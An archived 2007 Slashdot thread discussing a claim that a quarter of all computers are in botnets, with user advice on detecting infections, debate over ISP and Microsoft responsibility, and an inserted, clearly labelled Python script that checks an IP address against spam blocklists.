25 Percent of All Computers in a Botnet?

Posted by Zonk on Fri Jan 26, 2007 05:38 PM
from the you-might-be-one-of-them dept.
Beckham's_Ponytail writes to mention an Ars Technica article, with some disturbing news out of the World Economic Forum in Davos, Switzerland. Vint Cerf, one of the 'fathers of the internet', has stated that the number of botnets online is larger than believed. So large, in fact, that he estimates that at this point one in four computers is infected with botnet software. We've discussed the rise of botnets numerous times here on Slashdot, but the image of 150 million infected computers is more than a little bit sobering. With the extremely lucrative activities that can be done with botnets (such as password ripping, spamming, DDoSing), as well as reports of organized crime adopting 'cyber-terrorism' as a new line of income, is it likely that law enforcement will ever be able to curb this particular bane?

Related Stories

Meet the Botnet Hunters (194 comments)
An anonymous reader writes "The Washington Post is running a pretty decent story about 'Shadowserver,' one of a growing number of volunteer groups dedicated to infiltrating and disabling botnets. The story covers not only how these guys do their work but the pitfalls of bothunting as well. From the article: 'Even after the Shadowserver crew has convinced an ISP to shut down a botmaster's command-and-control channel, most of the bots will remain infected. Like lost sheep without a shepherd, the drones will continually try to reconnect to the hacker's control server, unaware that it no longer exists. In some cases, Albright said, a botmaster who has been cut off from his command-and-control center will simply wait a few days or weeks, then re-register the domain and reclaim stranded bots.'"
Is the Botnet Battle Already Lost? (374 comments)
An anonymous reader writes "Researchers are finding it practically futile to keep up with evolving botnet attacks. 'We've known about [the threat from] botnets for a few years, but we're only now figuring out how they really work, and I'm afraid we might be two to three years behind in terms of response mechanisms,' said Marcus Sachs, a deputy director in the Computer Science Laboratory of SRI International, in Arlington, Va. There is a general feeling of hopelessness as botnet hunters discover that, after years of mitigating command and controls, the effort has largely gone to waste. 'We've managed to hold back the tide, but, for the most part, it's been useless,' said Gadi Evron, a security evangelist at Beyond Security, in Netanya, Israel, and a leader in the botnet-hunting community. 'When we disable a command-and-control server, the botnet is immediately re-created on another host. We're not hurting them anymore.' There is an interesting image gallery of a botnet in action as discovered by security researcher Sunbelt Software."
Aggressive Botnet Activities Behind Spam Increase (194 comments)
An anonymous reader writes, "A spam-sending Trojan dubbed 'SpamThru' is responsible for a vast amount of the recent botnet activity which has significantly increased spam levels to almost three out of every four emails. The developers of SpamThru employed numerous tactics to thwart detection and enhance outreach, such as releasing new strains of the Trojan at regular intervals in order to confuse traditional anti-virus signatures detection." According to MessageLabs (PDF), another contributor to the recent spam increase is a trojan dropper called "Warezov."
Deconstructing a Pump-and-Dump Spam Botnet (382 comments)
Behind the Front writes "eWeek has teamed up with Joe Stewart, a senior security researcher at SecureWorks in Atlanta, to show the inner working of a massive botnet that is responsible for the recent surge of 'pump and dump' spam. It's a detailed picture of how these sleazy operations work and why they're so hard to shut down. Sobering numbers: 70,000 infected machines capable of pumping out a billion messages a day, virtually all of them for penis enlargement and stock scams. Excellent graphics, too, including one chart that shows that Windows XP Service Pack 2 is hosting nearly half the attacked machines."
This discussion has been archived. No new comments can be posted.
  • Botnets (Score:5, Funny)

    by eviloverlordx (99809) on Friday January 26 2007, @05:42PM (#17777208)
    Just wait until they merge and become Skynet. Then we'll really be in trouble.
    • Re:Botnets (Score:5, Funny)

      by Sabaki (531686) on Friday January 26 2007, @06:12PM (#17777776)
      The Terminator: The Spamnet goes on-line August 4th, 1997. Human decisions are removed from strategic marketing. Spamnet begins to grow at a geometric rate. It becomes self-aware at 2:14 a.m. Eastern time, August 29th. In a panic, they try to pull the plug.
      Sarah Connor: Spamnet fights back.
      The Terminator: Yes. It launches its nigerian spam against the targets in Russia.
      John Connor: Why attack Russia? Aren't they spammers too?
      The Terminator: Because Spamnet knows the Russian counter-spam will eliminate all non-zombies over here.

      Dr. Silberman: I'm sure it feels very real to you.
      Sarah Connor: On August 29th, 1997, it's gonna feel pretty fscking real to you too. Anybody not handling 2 million messages a second is gonna have a real bad day. Get it?
    • Re:Botnets (Score:4, Funny)

      Daleks: Exterminate! Exterminate!
      Cybermen: Delete! Delete!
      Botnet Bots: V1agr4! V1agr4!
  • Request (Score:2)

    by Gabrill (556503) <justinmahn.cox@net> on Friday January 26 2007, @05:42PM (#17777216)
    Does anyone know a utility/website for detecting and cleaning bots?
    • Re:Request (Score:4, Informative)

      by beakerMeep (716990) on Friday January 26 2007, @05:47PM (#17777312)
      I think a bot is just a virus/trojan/rootkit in terms of detection/removal. I think it's named "bot" more because of its function, e.g. sleeping and waiting for commands from the bad guy to start spamming email.
    • Re:Request (Score:4, Insightful)

      by 99BottlesOfBeerInMyF (813746) on Friday January 26 2007, @05:51PM (#17777398)

      Does anyone know a utility/website for detecting and cleaning bots?

      There are lots of tools for detecting bots; as for cleaning them, well that depends upon the environment I suppose. ISPs have tools for detecting likely bots, but generally don't have the authority or motivation to do anything. Large organizations like universities and corporations have tools for detecting bots and taking them offline until they are fixed. How does one go about cleaning bots though? Do you wipe boxes before you know what is on them? That is the only sure way to rid a box of malware since you have no idea what else is on it.

      The first question that needs to be answered is: what type of network do you want to clean bots from? The next is, how much control do you have over the machines?

      • Re:Request (Score:5, Insightful)

        by rtb61 (674572) on Friday January 26 2007, @06:25PM (#17777942)
        (http://www.on.net/)
        The major ISPs are the problem. They certainly can detect and clean it up but there is no profit in it, whilst there is a significant cost, not only in running the software to detect the suspicious activity on their networks but then informing the customer, assisting the customer in cleaning up their computer (they will demand it), then disconnecting the customers until they clean up their computer, then reconnecting the customer and repeating when the customer gets re-infected. The ISP I use do monitor their network for suspicious bot-like activity and will inform their customers about problems and, should the customer fail to clean up their computer, disconnect them, but they are a quality ISP and sadly in the minority when it comes to putting quality of service ahead of that extra few percent of profit.

        This is what you get as the result of profit first corporations, everybody else pays the costs and that cost often far exceeds (by a factor of thousands) the increase in profit that some asshat corporate executive wet dreams over.

        • Re:Request (Score:4, Interesting)

          by rbochan (827946) on Friday January 26 2007, @07:33PM (#17778814)
          (http://www.cnycomputerservice.com/)

          The major ISPs are the problem...
          A few months back, I did some work for some folks that were getting phone calls and actual snail mail from their ISP (rhymes with load gunner) telling them to take their computer off line and have it repaired. The ISP actually did cut them off, because their machine was saturating the line all the time as a spambot and as a server for other bot infections.
          The major ISPs will do it, but only if it's already costing them $$ in bandwidth.

          • Re:Request (Score:4, Insightful)

            by rtb61 (674572) on Friday January 26 2007, @08:13PM (#17779178)
            (http://www.on.net/)
            The catch is when major ISPs start charging for how much you use your broadband connections, it is more profitable for them to allow for botnets etc to continue.
    • Re:Request (Score:5, Informative)

      by bigberk (547360) <bigberk@users.pc9.org> on Friday January 26 2007, @06:06PM (#17777678)
      One interesting method is to query an anti-spam database using your IP address, and see if you are listed as a spam source. Quick checks can be done at robtex [robtex.com] or dnsstuff [dnsstuff.com].

      If your IP address shows up on PSBL [surriel.com], CBL [abuseat.org], SpamCop [spamcop.net], or WPBL [wpbl.info] your host is probably infected and a source of spam or other abuse.
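The blocklist lookup described in the comment above can also be done directly over DNS; this is an added example, not part of the original thread. The zone names are assumptions (the comment links only the operators' sites), and `sample_resolver` with its answers is constructed so the script runs offline.

```python
"""Check whether a public IP address appears on DNS blocklists (DNSBLs)."""
import ipaddress
import socket

# Assumed query zones for the lists named in the comment; the page gives only
# the operators' sites. Lists retire or move, so confirm each zone first.
ZONES = {
    "PSBL": "psbl.surriel.com",
    "CBL": "cbl.abuseat.org",
    "SpamCop": "bl.spamcop.net",
    "WPBL": "db.wpbl.info",
}

# Addresses a blocklist never sees: behind NAT the list records the router's
# public address, not the PC's own, so querying these proves nothing.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "100.64.0.0/10",
    "127.0.0.0/8", "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]
LISTED_NET = ipaddress.ip_network("127.0.0.0/8")  # range of "listed" answers


def query_name(ip, zone):
    """Build the DNSBL query name: reversed octets (or IPv6 nibbles) + zone."""
    addr = ipaddress.ip_address(ip)
    if any(addr in net for net in NON_ROUTABLE):
        raise ValueError(f"{ip} is not a public address; check the WAN address")
    if addr.version == 4:
        labels = str(addr).split(".")[::-1]
    else:
        labels = list(addr.exploded.replace(":", ""))[::-1]
    return ".".join(labels) + "." + zone


def system_resolver(name):
    """Return the A records for name; [] only when the name does not exist."""
    try:
        infos = socket.getaddrinfo(name, None, socket.AF_INET)
    except socket.gaierror as exc:
        if exc.args[0] in (socket.EAI_NONAME, getattr(socket, "EAI_NODATA", None)):
            return []   # NXDOMAIN: the address is not on this list
        raise           # timeout or server failure: unknown, not "clean"
    return sorted({info[4][0] for info in infos})


def classify(answers):
    """Interpret the A records returned for one DNSBL query."""
    if not answers:
        return "not listed"
    if all(ipaddress.ip_address(a) in LISTED_NET for a in answers):
        return "listed"
    # A non-127/8 answer usually means a resolver rewrote NXDOMAIN (for
    # example an ISP search page), so it says nothing about the list.
    return "suspect answer"


def check_ip(ip, zones=ZONES, resolver=system_resolver):
    """Query every zone and return {list name: (verdict, answers)}."""
    results = {}
    for label, zone in zones.items():
        name = query_name(ip, zone)
        try:
            answers = resolver(name)
        except OSError:
            results[label] = ("lookup failed", [])
            continue
        results[label] = (classify(answers), answers)
    return results


# Constructed answers for an offline demonstration (not real listings).
SAMPLE_ANSWERS = {
    "7.113.0.203.bl.spamcop.net": ["127.0.0.2"],
    "7.113.0.203.db.wpbl.info": ["198.51.100.9"],  # rewritten NXDOMAIN
}


def sample_resolver(name):
    """Stand-in resolver that serves the constructed answers above."""
    return SAMPLE_ANSWERS.get(name, [])


if __name__ == "__main__":
    # 203.0.113.7 is a documentation address used as a constructed sample.
    report = check_ip("203.0.113.7", resolver=sample_resolver)
    for label, (verdict, answers) in report.items():
        print(f"{label:8} {verdict:15} {', '.join(answers)}")
```

Drop the `resolver=sample_resolver` argument to query the real lists for your own public address. The exact `127.0.0.x` value returned encodes the listing reason, which each list operator documents.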
    • Re:Request (Score:4, Informative)

      by mrtexe (1032978) * on Friday January 26 2007, @06:10PM (#17777726)
      (Last Journal: Tuesday December 19 2006, @03:25AM)
      For Windows, use IE to go to Safety.live.com - Microsoft's official online free spyware, virus detector/remover [live.com] (choose your language)
    • Re:Request (Score:5, Informative)

      by sporkme (983186) * on Friday January 26 2007, @06:33PM (#17778060)
      (http://www.imwithfred.com/)

      Does anyone know a utility/website for detecting and cleaning bots?
      I use a can of airduster, a cotton swab and an alcohol solution to clean my bots.

      There are a bunch of port scanner sites out there that can check the integrity of your firewall. DSL Reports has a decent one if memory serves. Use Spybot Search & Destroy, LavaSoft AdAware and a good antivirus like AVG or Avast. If you suspect that there is unwanted network traffic to and from your system, use Ethereal to see where it is going to and coming from. If you suspect an exploit of Internet Explorer, HijackThis can shed some light on it. Check the task manager process tab for suspicious looking entries and Google them. Lay off the pr0n! and v1agr@ emails.

      By far the most powerful and versatile utility is The Geek Down The Street (TM), possibly surpassed by Your Local Computer Repair Shop (TM). Ultimately, there is no replacement for smart practices and secure software. Use an alternative browser like Firefox or Opera, or better yet pop on over to http://www.linux.org/dist/ [linux.org] and take your pick.
  • Use the poison as the cure. (Score:4, Insightful)

    by purpledinoz (573045) on Friday January 26 2007, @05:44PM (#17777238)
    (http://www.geocities.com/purpledinoz/)
    Isn't there a way to develop a virus that can spread through these compromised computers, but instead of doing the damage, it fixes the leaks? These compromised computers have some sort of back-door left open right?
  • 25%? BS.... (Score:5, Funny)

    by Karganeth (1017580) on Friday January 26 2007, @05:46PM (#17777264)
    95% of all statistics are made up on the spot. Luckily, this statistic is one of the few 9% of statistics which aren't made up so quickly.
  • And so it begins (Score:2)

    by shirizaki (994008) on Friday January 26 2007, @05:49PM (#17777338)
    Skynet, the end of the world, and the world being overrun with AH-nold robots.

    .....Let's hope they run Windows ME, so we have a chance of survival.
  • Law enforcement? (Score:3, Interesting)

    Why not start with the ISPs? Have them start policing their own customers and shut off their connections when a compromised system is discovered, then help that poor, unconnected shmuck clean their PC so they can rejoin the world wide pr0n.

    I spent two frickin' hours cleaning and protecting my sister's and niece's XP laptops over xmas. Pain in the ass, but at least they're running clean and happy now. This is after I said I'd never help them because they made the mistake of buying XP laptops instead of Macs. What can you do? Gotta clean it, even if it's partially the cause of the problem and the people using them are not of the highest technical ilk.
  • The only way they'll ever solve this one is to go to the source: Microsoft. Once that beast is no longer producing the tools criminals need, the Internet will be safe.

  • Me scared (Score:3, Funny)

    by jurt1235 (834677) on Friday January 26 2007, @05:50PM (#17777368)
    (http://www.hipersonik.com/)
    That would mean that 75% of computers would not be infected, ergo that 75% of users finally got the clue of protecting their system against viruses and malicious websites. Is 75% running Linux without notifying the nerds? Hey, we nerds run the minority system here! I am switching to MS Windows right now.

    (Another statistics victim)
  • maybe this might be possible.

    More likely is a statistic that said more than 25 percent of all IP addresses have at least one CPU behind them which is part of a botnet.

    That might be true.
  • Bogus Numbers (Score:5, Insightful)

    by madsheep (984404) on Friday January 26 2007, @05:51PM (#17777386)
    (http://www.securityzone.org/)
    I would be much more inclined to believe that 1 in 4 PCs are infected with one or more of the following:

    - Virus
    - Trojan
    - Worm
    - Spyware
    - Adware

    A few of the above are used almost interchangeably (by some people) and have the capability of effectively making the machine into some form of a bot or zombie (remotely controlled or not). Now, to say that 1 in 4 machines are bots I would have to wholeheartedly disagree with. This just isn't very likely. Especially since the lifetime of a specific botnet has gradually been decreasing. Faster AV responses, increased patching, and more bot competition will inherently decrease these odds. Sorry, but the daddy of the internet or not... I think he's off the mark.
  • Imagine that (Score:1)

    by ubergoober (151136) on Friday January 26 2007, @05:55PM (#17777462)
    My job has me traveling the country to troubleshoot and train on our company software. Considering almost 50% have both Google AND Yahoo toolbars installed... somehow I'm not surprised. Most don't even know how to use the toolbars at all.
  • South Korea? (Score:5, Insightful)

    by garcia (6573) on Friday January 26 2007, @05:55PM (#17777472)
    (http://www.lazylightning.org/)
    With 99.9% of South Koreans "shackled" to Windows [slashdot.org] and "sitting behind fat pipes", why are we surprised?

    I keep banning new IP ranges originating from .kr. It wouldn't surprise me at all if 99.5% of them were infected over there.
  • Accountability (Score:2, Interesting)

    by DrLov3 (1025033) on Friday January 26 2007, @05:57PM (#17777504)
    Accountability !!!
    If I leave my car unattended with all doors opened, engine running in front of a bank. If this bank gets robbed, and my car is used by the robber as a getaway car, I'm accountable in front of a judge ..... right ??!?!

    Why not the same with computers left unprotected and unattended ?
  • Cybercrime (Score:5, Insightful)

    by mandelbr0t (1015855) on Friday January 26 2007, @05:58PM (#17777518)
    (Last Journal: Thursday March 01 2007, @01:53PM)
    I wonder how up-to-date Law Enforcement is on Cybercrime, i.e. crimes that are perpetrated in Cyberspace. There's just so many things that place them at a disadvantage. First, there's often the argument that no crime has even been committed. The 'net is a wild and crazy place, and if you're on it, there's personal responsibility for protecting yourself against the constant background of malware. Most people haven't been educated in this respect.

    Second, IP forensics is a rather arcane art. Few are schooled, even fewer are of the calibre that Law Enforcement would need on their side. I'd guess that it's still more lucrative to be on the wrong side of the law, and given the nebulous nature of many of these crimes, there's just not much attraction to being a computer cop. There is a process, if you're interested, to become an expert witness in this field. That's a step in the right direction, but it's only part of the overall legal process. We still need Law Enforcement officials who are willing to press charges and a judge who's willing to sign required warrants.

    Finally, there's the anonymity factor. Even IP forensics won't get your man. It'll get you their IP address, but it's a long way from the IP address to the culprit. There's dozens of arguments which could explain why your Internet connection has been implicated in a Cybercrime, most of them raising reasonable doubt.

    It's possible, however. "Where there's a will, there's a way." We have to take these crimes out of Cyberspace, and start correlating information between network and reality. After all, there's generally financial transactions associated with large spam deliveries and 10k+ botnet DDoSing. It's a lot harder to claim that you're a victim of circumstance when not only was your IP spotted crawling through an ISP's subnet in suspicious ways, but you also received a few grand just before a mysterious DDoS that brought down a major website.
  • Damn! (Score:4, Funny)

    by Anonymous Coward on Friday January 26 2007, @06:00PM (#17777556)
    I've got 4 computers in my house... now I've got to figure out which one of them is part of a botnet!
  • Class action (Score:3, Interesting)

    by bigberk (547360) <bigberk@users.pc9.org> on Friday January 26 2007, @06:00PM (#17777566)
    There could definitely be a class action lawsuit at some point facing Microsoft. That one company has a mass deployment of an operating system that is obviously dreadfully vulnerable to infection. Some might reasonably argue that Microsoft has an implied duty to provide a reliable operating system, as the backbone infrastructure of the modern computing world.

    Among the victims of the easily infectable Windows platform are:
    1) Large internet service providers, who suffer tremendous bandwidth costs due to DDoS attacks and spam
    2) Sites that have been forced offline or had skyrocketing costs due to DDoS attacks
    3) Businesses which suffer downtime due to networks congested with worm activity

    I think it is time for an ambitious group of lawyers to start barking up this tree. It wouldn't be so big a concern if it wasn't for the fact that Microsoft has made a specific effort to roll out their operating system as a foundation of the world's business computing. They are providing faulty infrastructure.
  • Aborted cliche (Score:4, Funny)

    by Tsar (536185) on Friday January 26 2007, @06:01PM (#17777586)
    (http://tonyc.com/ | Last Journal: Tuesday February 17 2004, @12:12PM)
    I was going to post something about imagining a Beowulf cluster of these or of welcoming our new botnet overlords, but the bot on my computer started threateNO CARRIER
  • Evidence? (Score:2)

    by N7DR (536428) on Friday January 26 2007, @06:04PM (#17777646)
    I've seen this reported several times in the past few days. But nowhere have I seen any kind of explanation as to how he arrived at this number. Frankly, I find it unswallowable without some fairly convincing evidence. Maybe he has such evidence (I sure hope so), but if so, where is it?
  • Yes it is possible to eliminate (Score:4, Interesting)

    by gurps_npc (621217) on Friday January 26 2007, @06:12PM (#17777770)
    The single reason why spam and other net abuses go on is that there are no worldwide laws. It is a public crime; people can click on the spam and hunt down the person committing the crime simply by following the money. They get away with it because if one country creates an effective law and enforces it, the spammers can just move to another country.

    You want to cure it? Have ICANN come up with a set of standard, simple guidelines. Not censorship, just simple things like "No sending out spam emails", "No Zombie Bot". Then have ICANN rule that failure to pass laws enforcing these guidelines (individual countries get to decide what the actual law would be) or failure to cooperate to enforce them results in disconnect for that country from the rest of the internet. That would be ICANN's sole enforcement power.

    Give people a 3 month warning, then start disconnecting the countries that are the worst violators, giving the secondary violators another warning. In one month, if they pass new laws or fund new enforcements, they get a trial hook up again.

    I predict one year of nastiness, during which all countries scramble to create and enforce real laws.

    The worst of the worst of the offending countries, might split off and form a secondary, 'dangerous' internet. But who would care.

  • imho 50% more likely (Score:1, Troll)

    by Qbertino (265505) on Friday January 26 2007, @06:23PM (#17777914)
    I'd say the real number is closer to 50%. Lots of bots out there that make an effort not to be noticed and just bog down the system. I hear from countless Windows users how slow their boxes are. I'd say it's a sure guess that at least 60% of those are compromised.
  • The ISPs could help stop this (Score:5, Interesting)

    by vinn01 (178295) on Friday January 26 2007, @06:25PM (#17777958)
    I blame the ISPs for allowing traffic to leave their networks with spoofed IP addresses. That is - passing IP packets that are sourced within their network with IP addresses that are not within their network.

    Botnets spoof IP addresses to make it harder to track down the bots. But the ISPs know where the bots are and could kill them, or filter them, if they had the testicles to do it. By passing the spoofed-IP-addressed traffic they make it harder for the rest of the world to filter the bots.

    Botnets would be a heck of a lot easier to filter, and choke, if valid IP addresses were forced on all traffic.
  • by Darth Muffin (781947) on Friday January 26 2007, @06:32PM (#17778038)
    (http://www.pebkac.us/)
    I wonder how they got that 150M number--if it's the number of Bots out there or the number of infected PCs? If it's the former, and I suspect it is, you can't equate that to the number of PCs. One PC can be a member of several botnets. From what I've seen (and most of you have probably too), a PC either seems to be clean or has 14 bots and 95 pieces of spyware on it depending on the user's habits and training.
  • This will change with Vista (Score:5, Insightful)

    by centron (61482) on Friday January 26 2007, @06:34PM (#17778070)
    (http://www.xeomage.com/)

    After getting feedback that the majority of their users have Spyware installed on their systems, Microsoft decided to incorporate spyware directly into the OS (embrace and extend). With the release of Microsoft Vista, your computer will come with software that runs silently in the background, regularly checks in with their network, and can be completely disabled remotely, similar to botnet software produced by others.

    While this system is not pre-configured to send spam or generate DDOS attacks like many other botnets, it does have the ability to download new functionality in the background through Windows Update, so this capability could be added at a later date if enough customers continue to install third party botnets. This means that while your Vista computer is already part of a botnet out of the box, it's fairly dormant. As an indication of the ominous potential of this enhanced system, Microsoft is calling it 'Windows Activation'.

  • Let's say I sit down at a computer and I want to find out if it is being used as a botnet.
    What is the best way to go about it? Monitor ports? Is there a piece of software that can detect it for me? Preferably something I can run anytime, but not have it loaded when I am not running it, i.e. not like antivirus software.

    Ideally something whose output isn't intimidating to a user that may need to read the results back to me. I'm thinking family computers here.

  • straw poll..... (Score:2)

    by nblender (741424) on Friday January 26 2007, @06:43PM (#17778180)
    How many of you people making fun of the poor windows weenies whose machines are on botnets, are currently running your own mailservers at home on your dynamic broadband connection and would subsequently cause your ISP all sorts of grief if they suddenly blocked outbound port 25 ?

    Yeah, that's what I thought. Hell, half of my co-workers are linux fanboys who run mail servers on their broadband connections, say things like "I don't trust anyone to route my mail for me, not even my ISP" while complaining about spam and botnets.

  • 1 in 4? (Score:3, Funny)

    by eod_punk (832062) on Friday January 26 2007, @06:44PM (#17778186)
    Thank god I only have 3 computers then.
  • by ThePopeLayton (868042) on Friday January 26 2007, @06:45PM (#17778196)
    My computer is currently running really well and although I don't have any problems, when I hear stats like 1/4 computers is part of a Bot Net it makes me wonder. Is there any way to find out if my computer is part of a botnet?
  • A phenomenon enabled by and contained within the MS ghetto. So why doesn't the summary mention it in big flashing letters? This is part of the Windows experience!
  • BIG Orgs & BIG $s (Score:2)

    by BoRegardless (721219) on Friday January 26 2007, @06:53PM (#17778320)
    Big organizations always seem to have a "wait and see & let someone else fix it attitude", after all, the VPs are always traveling around incessantly attending conferences, mostly on the other side of the country or on an island outside the U.S.

    Big $s means there will be a lot of "retirement" suggestions being quietly made over coffee prior to the ICANN meetings designed to keep the status quo.
  • I, for one... (Score:1)

    by SonOfSengaya (582624) on Friday January 26 2007, @07:00PM (#17778442)
    (http://www.sengaya.de/)
    I, for one, welcome our new botnet overlords!
  • I am not a professional sys-admin, but I run anti-spyware and anti-adware programs regularly (weekly) and have anti-virus software (AVG) running on my computers. I got firewalls (hardware and software) and keep my machines patched. I use firefox rather than explorer and use web-based gmail instead of outlook.

    Am I still in obvious danger of being infected by bots? How would I find out if any of my machines is infected? All the precautions I take seemed reasonable enough a few years back. How do I continue safe internetting?

    Any practical advice would be welcome.
  • How many are Macs? (Score:2)

    by david.emery (127135) on Friday January 26 2007, @07:33PM (#17778818)
    This is actually a kinda serious question. Zombification can occur through social engineering attacks on even the most secure system (it's that damn biological IO unit that's the weak point.)

    Can anyone cite successful attacks on Macs turning them into Bots? (I'd feel much more comfortable defending my own machines if I knew of what has happened to others...)

              dave
  • Me not (Score:2)

    by tronicum (617382) * on Friday January 26 2007, @07:39PM (#17778902)
    I have four computers, but none of them shows bot-net activity!
  • You Are Required by Law (Score:5, Insightful)

    by rubmytummy (677080) on Friday January 26 2007, @07:46PM (#17778966)
    You are required by law...
    • to disconnect any equipment that interferes with the PSTN.
    • to have your dog killed if it is rabid.
    • to clean up a toxic chemical spill on your property.
    • to take the medication that keeps you from spreading tuberculosis.
    • to either fix any interference caused by your ham radio, or stop using the thing.
    So, just how complicated is the solution to botnets and similar public network security issues?
    • Re:You Are Required by Law (Score:4, Interesting)

      by Watson Ladd (955755) on Friday January 26 2007, @08:39PM (#17779400)
      It's easy to tell that you have a rabid dog, a toxic waste spill, a bad phone line. It's hard to tell if your computer is part of a botnet, esp. if you only have 1 and your ISP is uncooperative. Also, insecure computers don't join botnets by themselves, they get hacked. Saying the owner needs to fix it is going to lead to a lot of outcry about how people who don't understand computers are getting jailed for something they aren't responsible for. They won't get one iota of sympathy from me, but all other lusers will oppose these laws.
      [ Parent ]
    • Re:You Are Required by Law by khayo (Score:2) Friday January 26 2007, @11:21PM
  • by gp310ad (77471) on Friday January 26 2007, @08:00PM (#17779074)
    (http://edebris.com/)
    Stop prostitution by jailing clients
    Stop drugs by jailing users
    Stop botnets by jailing bot owners

    If the stigma associated with having a botfly crawl out of one's skull would attach to botnet infected computers, the problem would go away in a matter of hours.
  • by flyingfsck (986395) on Friday January 26 2007, @08:08PM (#17779130)
    This is a Microsoft problem. Ol' Billy Bob has to fix the fscking mess he made.
  • by dotcomworker (1056354) on Friday January 26 2007, @08:08PM (#17779136)
    I work for a company that relies on these 25% of retarded computer users for revenue. So long as their computers continue to recruit more retards, I could care less. If anyone grows a brain and causes me pain then I will be forced to find them and unplug their computers. Does anyone buy this "father" of the Internet story anyway?
  • When we report this kind of stat, can we please report it accurately and say that 25% of Windows computers are in a botnet, or infected, or spamming us, etc...

    This in no way applies to any Mac, Linux, Unix, or other machines. Botnets are, at this point, unique to windows! Make sure everyone knows it!

  • by subl33t (739983) on Friday January 26 2007, @08:42PM (#17779436)
    The sooner the better. All the Joe Users out there who take no time to make sure their computers are safe will need to be held accountable. A lot of people are losing a LOT of money because of this. Eventually the big money people are going to successfully lobby to make it so.

    When Gates/Ballmer find their customers getting fined or worse (better) then we'll start to see results.
  • 25% is not enough (Score:1)

    by thorkyl (739500) on Friday January 26 2007, @09:19PM (#17779738)
    With all of the windoz machines and Aohell it's got to be higher
  • by Lotharjade (750874) on Friday January 26 2007, @09:32PM (#17779828)
    (http://www.uaf.edu/ | Last Journal: Thursday April 28 2005, @03:45AM)

    How long till someone uses this troubling activity for good? How long till we see a SETI.bot or FOLDING.bot virus out there that invades your computer, and works in your free time to search for aliens or cure disease?

    Distributed_Computing.bot AKA "Distributed Computing for Dummies (the REALLY easy install)"

  • by Megane (129182) on Friday January 26 2007, @10:00PM (#17779976)

    I use ALTIMIT OS. [wikipedia.org] Yeah, I know the market share is small, but we'll never get pwn3d. Windows is so full of holes they ought to outlaw it.

  • What about a broadband users license? (Score:4, Interesting)

    by bdwoolman (561635) on Friday January 26 2007, @10:10PM (#17780050)
    (http://www.bdwoolman.net/)
    There are ham licenses. Why not license high-speed access in some way? It is also powerful. The process does not have to be hard, but at least one person, say, at home or in the SOHO should demonstrate he or she knows how to secure the computer (to some minimal standard) and keep it that way before a broadband install is allowed to the address. You can create all the fine security software and solid OSs you want, but unless the users are clued in then it is hopeless. The bar does not have to be set that high. But there is nothing like a license to motivate a little learning.

    Or at least require ISPs to provide minimal security training to their broadband customers. As has been said: Most infection is self inflicted through ignorance. Some people might welcome the chance to learn. I know I did not want to scuba dive without some training. A lot of parents would be motivated to learn about filtering software etc. A license should be grandfathered in of course. This problem will worsen in direct proportion to bandwidth. And certainly there should be citizens' band speeds. (TBD)

    People might grumble, but if it is sold as a community responsibility a license track might fly. Most (well, many) people are motivated by a sense of community responsibility. I had a young friend whose computer was a viral soup. Infected beyond redemption. Ruined. I reinstalled Windows for her, which cleaned up the mess, but she was resistant to the idea of anti-virus software because she claimed she did not do anything serious with the computer and did not want to hassle. Her current mess had taken years to build. And, she asked, couldn't she just redo the box again when it tanked? But I pointed out to her that it wasn't just her that suffered, it was the whole community that suffered when she left her computer vulnerable. (I explained a little about bots) The idea that she could be hurting others through inaction really upset her (she had never thought it through) and so we were downloading Zonealarm, AVG and AdAware in no time. In the end she bought a subscription to a suite. McAfee I think.

    Before anyone starts screaming about rights and freedoms being taken away, please think about this: A license is a way that a civil society makes its members accountable, from food vendors to electricians. I am less free because of all the bots out there. If people can't get on the highway without demonstrating some knowledge, why should they get on the information highway in a state of ignorance, especially now that we are banking and shopping there?

  • Microsoft seems to have lost a lot of market share in the computers to Linux and Mac, only 25% of computers running Windows anymore?

    I know this will get modded flame by some fanboy, but it's funny, laugh.
  • I wonder how many of those bots are Microsoft Operating Systems...

    I'm just asking...

  • you know a bot that kills bots
  • by samantha (68231) * on Saturday January 27 2007, @05:15AM (#17782122)
    (http://slashdot.org/)
    Davos is not exactly a forum where I would expect to hear of such things. How do we know that the actual purpose of this claim is other than to stir up fear to justify massive governmental crackdowns on the Internet? Certainly the referenced article gives not one shred of supporting evidence. If kiddie porn and spam don't do it then let's find some other excuse by all means. Why should any of us take this figure seriously without considerable evidence? Some of us who are well aware that it isn't that easy to coordinate even a small network out in the open. To network many millions of computers in secret successfully implies all the really good hackers wear black hats. I don't buy it. Look for the effects. Ask who or what may benefit.
  • So? (Score:1)

    by Ivan Matveich (998090) on Saturday January 27 2007, @11:05AM (#17783450)
    IP is unreliable and insecure by design. If people want security and quality-of-service guarantees, they should use another network technology. What else is new?
  • by wallet55 (1045366) on Monday January 29 2007, @10:20AM (#17799862)
    Interesting parallels with biological parasites. Early computer virus/worms did damage, intentionally or unintentionally, which drew attention to themselves, causing them to be removed. In microbiology this is the bad parasite, that kills the host or provokes an immune response. Botnets have moved up to the commensal parasite level, living as undetectably as possible, leaving their hosts unharmed for the most part, even patching and preventing other botnet infections. One wonders if the world PC population will adapt as have humans to live with and benefit from parasites (probably not!)
  • by BSAtHome (455370) on Friday January 26 2007, @05:49PM (#17777348)
    I guess annoying users by imposing a $1000,- tax per month on owning a computer is more effective. Then maybe the refrigerator will finally stay off of the net.
    [ Parent ]
  • Re:Just install linux (Score:2, Insightful)

    by nuclearpenguins (907128) on Friday January 26 2007, @05:49PM (#17777354)
    Until they want to play the latest and greatest games. Then what? And don't give me the emulator lines, I'm talking out of box ready to play. You will not get rid of Windows, face that fact. The trick is to educate people on how to better protect their Windows machines against such things.
    [ Parent ]
  • Re:How to stop the bots (Score:2, Insightful)

    by Score Whore (32328) on Friday January 26 2007, @05:51PM (#17777392)
    Presumably every OS can be bot-free. I mean it's not like they come pre-installed.

    If you mean permanently bot-free, then it's going to be an empty internet because every OS has security issues.
    [ Parent ]
    • Re:How to stop the bots (Score:4, Insightful)

      by Hawthorne01 (575586) on Friday January 26 2007, @07:30PM (#17778790)
      Yeah, as much as I like living pain (not worry) -free with OS X so far, it's only a matter of time until the cost/benefit of launching a reasonably successful large-scale attack against the OS arrives.

      In the meantime, I'll keep Clam AV going, backup regularly, and keep my admin account separate from the others.
      [ Parent ]
      • Diversify Now. (Score:4, Insightful)

        by twitter (104583) on Saturday January 27 2007, @12:31AM (#17780910)
        (http://lists.clickers.org/linuxsig/index.html | Last Journal: Friday November 09, @11:00PM)

